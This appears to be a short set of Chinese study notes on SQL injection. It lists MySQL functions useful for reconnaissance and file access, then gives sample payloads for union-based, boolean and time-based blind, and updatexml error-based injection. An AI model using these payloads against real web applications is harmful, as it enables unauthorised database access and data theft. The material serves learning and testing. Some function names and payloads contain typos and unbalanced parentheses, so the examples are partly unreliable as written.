函数名称 作用
system_user() 系统用户名
user() 用户名
current_user() 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() 数据库版本
@@version() 数据库版本
@@datadir 数据库路径
@@basedir 数据库安装路径
@@version_compile_os 操作系统
count() 执行返回结果的数量
concat() 没有分隔符的链接字符串
concat_ws() 含有分隔符链接字符串
group_concat() 链接一个组的字符串,以逗号分开
load_file() 读文件
into outfile 写文件
ascil() 字符串的ascil代码值
ord() 返回字符串的第一个ascil值
mid() 返回字符串的一部分
例子:select mid ('mysql',1,1)
substr()
例子:select substr('mysql',1,1)
length() 判断长度
floor 返回小于或等于x的最大整数
例子:select floor(5.9) 结果返回5
extractvalue() 第一个参数:xml对象名称,第二参数为xpath字符串
作用:从目标xml中返回包含查询的字符串
updatexml() 第一个参数,xml对象名
第二个参数,xpath表达式
第三个参数,新的字符串,替换查找到的符合条件的数据
改变字符文档符合的节点值
sleep() 睡眠
if select if (1>2,2,3); 如果表达式为真返回第二个,否则返回第三个
结果:3
char() 返回整数ascil的字符串
sql注入样例分析;
and 1=2 union select 1,2,3 --+
select user() regexp '^ro'
ascil(substr(select user(),1,1)) =114
if(ascil(substr(select user(),1,1)=114,0,sleep(5))
(ascil(substr(select table_name from informatio.tables where table_schema=database() limit 0,1),1,1))=9)
updatexml(1,concat(0x7e,(select @@version),0x7e),1)
